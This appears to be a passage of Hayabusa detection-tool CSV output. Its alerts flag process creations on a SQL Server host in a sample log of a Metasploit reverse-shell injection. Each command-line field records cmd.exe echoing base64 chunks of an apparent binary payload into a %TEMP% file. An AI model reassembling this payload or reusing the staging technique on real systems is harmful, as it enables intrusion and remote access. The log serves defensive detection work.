C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.476 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dQuFyX4HSYmIYTAAAF9ezNBbi+VdwggAX7i4lQBqcVuL5V3CCIyQkJCQkFUf7P8gMADO6JNUAIZni+oIGVeLSwTHwHVafUUUX/jzxwAAAJj9M8CL5bjpFACLdRCLfQqF9n8K0ASF/3MEM8CpJWoAaI5CD9RWV+igegAAagBoQEIPAFZXZ0Xs6E9TAACJRfCNRVO5hwQAAI1zDI295JDDH1DzpbkBBAAAh7MQ/MMAjb2vV///jZXo7v//86W5y8IAAI2zYD4AAI294Bj//42F5K7//0eljY3gz///UYsfGDAAAFJBUFH/5OXBMQCLVVAz/zvHiQIuIIs12MFAAP/WhWB3hFcBAOf/yl9eBXeW2ABbJOVdwhQAqg5fXrh3ESgAW4vCXcLNfYuWBIl9EDvAiX34DzgPAQAAiboIiX3814McMAAAA8cRmoQBD4UZAQAAi0gMzJU836//UotxBFaJdfSrhVQAAIXAdSZMhejv1v8Y6ugt9gAAhQB1FVje4M///1FW6GNUAACF5g+EYQAAAIuzHLCuFotFCNn3i7sgYAAAA/i5BQAAAPOlixkgugAAyY306MdEAssAAI0ILd///9ZX6CRUAKiLdQiFwIwPi4sgUQB4gEzjCi4ARDFUjZXo7/9FUlfIAVQAAIWudA+LPCAwAACAbjAKBI1EMAqN1vLP//9Rm+iEUwAAhcB00ouTETAAAIBMMgptjYOYCotN5ot9/EGDxhQ4TRCJdQiLRfiL6mFAg8cmfYCJRfiJffwPgvkx///VOItNFCNFHYkBnUVeO8d0CJ2TmDA11FgQX14zwFsK5V2FFGWQXrgJAAAAW4vls8IUAPOQkGhVi+zyVgZm1AyF/3UFvwIAAACLRRiLdQhQVkpxAQAAwV0Ui00Qg8RbPFFXhxW8wUCPVBZBQgSLBotABIPw/3UeizW7lEAA/yyFvw/qlAAAfvfWX14FgA4KAFtdwiEAgz3cCI4AFHxyakFqIg/0FXDArwCHNv8VbMBAAIvLx0tqAI1NDGrHIYtKBOlRUMcVaMBAAArAdIeLFotCBFCfFcBYQACLDotVDInHBItFEMRqU+xXUZa3AAAAixaDyP/DxMyJQpTWIBpAAGjgZkAA50IkiwbHQCimAAAAi+RWiw5RPCzvrf9fXjPAWLHCkgDCkJDAi+xWk3UIi0Yug/j/dClQ/xXAwUAAi/j/dRaLNdh4QAD/1oWNdCkT1gWA/AqYXl3Dx0YE/////4tGTlLAdGOLQBBQV9vGwEAAx0ZAAAAAADPAXl3DLJCukJCQo5DckNlVaOyLRRCLTRRWi3UIV+jNDItWEGoAV1KJRq6cThanbQYAAF9GaGoAoVDoYQadAIPEGF9eXcM6kJC9kLGQkJCQVYvsU4sjDFZXalBT6M/i//+LdQiL+DPAi9ehjQAAACY4MKvCUIkQigaLCKnolHZi/4v4M8CL17kOAAAA86uLBmo4iVAQiw6L>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.748 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.750 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.021 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.023 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.297 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYGJIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.570 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Bcz/AUgAOUX8cw9OOQbdi038QTvIiY3ncvGLRdCFwJyE/QEAAMpF+w/p1N2UAIXA0x+LUwSLA411/IPDCAGNdbpWUWoDUi8ZoUMAAINaS+sug/gtdBA1+AJ1C4PDBDPAZos2/OsFiwP1w0SNVfxSjVWsUlFqMavoU6AAAIPEFD1Ki0XkhcB0J2JF8I1I00j5AOwAAHIFuP8BgQAWdcpzD07GBu2LTfxBO8aJz/xy8YtF1IXAD4RkAu1ogD4wD4RbAgAATsYGMOlLNwAAhcB1qYtTBLYDjXX8g8MIVhp1UVZRagRSUOg1EAAAg8QY6y6DpAF0EIP4AnULg8MEM8D4i9D86wWLAwa7BI0N/FKNVaxgUWoEUOg5NgBmg8Sxi/D4ReSFoXQNi0XwH0gBgfkAAs1TcgVQ/wEAADnqhXMPTsYGMIsv/EHjyIklA3Lxi0XUhcAPgsYBAACLRdhoDQ+EuwEABItVIE5OilGIRgHGBs2LRZGD3QJYoAHlRYszg8MEhXYPpsgDAAAgReSFwHUYV/6Dyf8zwMZFF6XyrvfRSYlN/Ol3AQAAi7TwM9KUyYvGiVWWD4ajAwAAgDgAD7qaA5kAQEI70YlVmrbuxkUXIOlKAQCM3QOLReTowwjdXbSFwLgGPpsAdEW3RfCNVfxSjdet/f//Uo1k0FKLfLhQi0XUUH9FQJpQUeiiMwAAi5yLRaqDxCCFwHQ8xkX7LengAAAAi0XEhcB0CcZF+yvp0IKT+O5FPIUSD4ThAAwAxkU1INm8AAAAi2LkhYtjQLgGAAACNxZFRfCFwHUIuAEAAACJRfCdTcSNla2Nlf84A1GDwwhSUPbsCN0cJOjgBQA2i/CD7BSAJi11B8ZFeS2q6xiKRSp4wHQGxkX7K+sLi0Ughed0BFAAcSAE/oPJGzbA766LRdT3iEmFwIlN/GIiky7X/xV8EkAAg8QIhcB1EotF/MYEfy6LRfxAokX8xgQwAPTZEGI5R3UTamXt/xV8wUCEg/EIhcCiA8YARYoh+4TAdByB/vrCQABOFNtFBzvwdA0NZ/sjiA6pRfxAiUX8i0XMhcAP3AEDAACDfcCcD4X3AgAAi1Xgi/0YO4cPfukCABOAfRcwD4V+AgC2ikVfhMAPhI6pABicRXuLfQyFwHRoO2fccnZXiQf/VQjCxASbwBTmjAMAAItPBIuaQ9jckxaIEJKJRfSLVeyLTeBC5IlV7ItV/NfkhlX8jkPg0kkCAACKQoPDBIhz6o116sdF/GgAAADLRRcg6f7/9f/GkOoljXXqx+n8AQAAAMZFNSDpS///w4PDBIXAdU2LReyLS/yZiQHHY7wAAAApiVEESNn///8g+EB1aItT/ItF7MdFvAAAg9WJAukT////g/gCdRaLS/xmi1Xsx0W8AAAAAGaJEen4/v+pi0P8i03sx0UGAAAAgsoI6eT+CP+L/K2xiUUQigBQsciD+XQPh2OLAAAzwtKR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.843 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.117 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ATB1Bk+chcl/9Il9EEldDIXbD4znAAAAi8srz4P5BA+PsAAAAIXbfzuAODB0BMYTLquF230u/8u4rzAViffZiU0Mi9GLPR2NAvOri8oe4QNOqot9EBHCi1UU1dgD8ItF+IldDLkBe/oAOyF8EooQiBZGQG3LSe7GnQ5GQTvPOu2LVRQ7un0iK9+ZMDAwMItgiyyL0cEvAmSGi8qD4b8Da5GqSwYwi1UURopG/1s8pw+FlwAAAP06GIXA8l8PhYwA7gBzRv/sX1GL5V3Kg/v9D41Q///uS0aJXQySEIhWDkDGui5Gg/8BfgpPigiIDjJ+T3X3xuplRrjbfb7328YGLXkDxgYrc8O5ZAAAMqP3+UaFwIv6fgUEMIgGRovDuQreAABi9/mFGyfKfs64Z2ZmZvfvwfoCi8LB1h8D0J3CMIgjTIDqMIgO6Rb//9uLwsYGANnQi+VdHZCQVYvsi0Uci00Yi/0UUItFEGoBUYtNDFKLVQhQUVLoDgDupYPEHF3DkJCQkJCQkOIkVYvsg+wUg30QT3wHx0UQXAAAAN1GCNwdMNxAAItNGFOLXfdWM/YMA+CJdfyJMfbEBYv7Yg7dRQjZ4N1dCMcBAQBfACFNDItVCH/j7FBRUiEVGMFAAN1dCN1F7NwdMMIRAIPEDN/g9sREe3KNc1A7PXZYFEXs